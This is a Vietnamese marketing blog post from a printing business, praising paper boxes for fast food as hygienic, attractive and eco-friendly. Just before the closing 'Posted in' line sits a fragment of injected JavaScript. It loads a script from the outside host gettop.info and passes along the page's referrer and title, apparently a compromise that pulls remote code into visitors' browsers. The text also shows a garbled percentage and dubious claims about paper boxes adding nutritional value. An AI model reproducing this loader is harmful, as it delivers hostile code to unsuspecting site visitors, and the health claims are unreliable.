In ấn - thiết kế

Hộp giấy đựng thức ăn nhanh, tiện lợi và an toàn

Hộp giấy đựng thức ăn nhanh, tiện lợi và an toàn

Hộp giấy đựng thức ăn nhanh, tiện lợi và an toàn

Đánh giá in sản phẩm

Có thể bạn đã biết, ngành thức ăn nhanh được du nhập vào Việt Nam từ năm 1997 với chuỗi cung cấp lớn của KFC, tiếp đến là hàng loạt thương hiệu có tiếng khác như Lotteria, Pizza Hut, Burger King,… Cho đến nay, thức ăn nhanh ngày càng được ưa chuộng ở nước ta, nhất là ở các thành phố lớn. Với sự tăng trưởng hàng năm đạt hơn 26{734382cb2d75c8d7b1ec1d8ba5586710cb984dec5ba9b1e3d108c4f601277519}, thị trường thức ăn nhanh như một miếng mồi béo bỏ mà doanh nghiệp nào cũng muốn chiếm lĩnh.

Do vậy mà trong cuộc chiến giành lấy thị phần, ngoài chất lượng và giá cả, việc thay đổi hình đóng gói từ bao bì nhựa sang hộp giấy đựng thức ăn nhanh cũng được chú trọng không kém. Việc thiết kế và in hộp giấy để đựng thức ăn sao cho đẹp mắt giúp sản phẩm nổi bật hơn về hình ảnh, tác động mạnh đến thị giác, từ đó sẽ ảnh hưởng lớn đến quyết định mua hàng của khách hàng.

Hộp giấy đựng thức ăn nhanh có thể dùng để đóng gói rất đa dạng các loại sản phẩm từ thực phẩm khô, ngũ cốc, bánh mì, bánh nướng,… cho đến thực phẩm đông lạnh, thức ăn nhanh, các sản phẩm tươi,… nhằm tăng giá trị dinh dưỡng của thực phẩm. Không những không gây hại cho sức khỏe, hộp giấy đựng thức ăn nhanh còn hết sức thân thiện với môi trường do được sản xuất hoàn toàn từ nguyên liệu gỗ – cũng đến từ thiên nhiên. Đây là lý do tại sao hiện nay hộp giấy được khuyến khích sử dụng rộng rãi để thay thế các sản phẩm bao bì khác, nhất là đối với mặt hàng thức ăn nhanh.

Hộp giấy đựng thức ăn nhanh

Túi giấy handmade đựng thức ăn nhanh

Hộp giấy đựng thức ăn nhanh có ưu điểm

Mang đến hình thức đẹp mắt cho thực phẩm, đánh vào tâm lý mua hàng của người tiêu dùng. Hộp giấy giúp tăng cường vệ sinh an toàn cho thức ăn nhanh. Có thể thấy được hộp giấy đựng thức ăn nhanh dễ dàng phân hủy mà không gây ô nhiễm môi trường. Bên cạnh đó, hộp giấy đựng thức ăn nhanh có thể bảo quản vitamin củ sản phẩm, chất dinh dưỡng dưới ánh nắng mặt trời tốt hơn các loại bao bì khác.

Đời sống của con người ngày càng cao theo thời gian, nên nhu cầu được phục vụ cũng vì thế mà lớn dần. Ngành chế biến thức ăn nhanh là một trong những địa chỉ quen thuộc được nhiều người tìm đến. Vì thế, để cạnh tranh với các doanh nghiệp khác thì các nhà đầu tư cần nâng cao chất lượng cũng như hình thức nhằm đánh vào tâm lý của khách hàng. Sử dụng hộp giấy đựng thức ăn nhanh vừa tiện lợi lại an toàn cho sức khỏe con người, mang lại lợi ích to lớn về mặt xã hội và môi trường chính là lựa chọn hàng đầu.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Posted in: Thông tin in ấn

Leave a Comment (0) ↓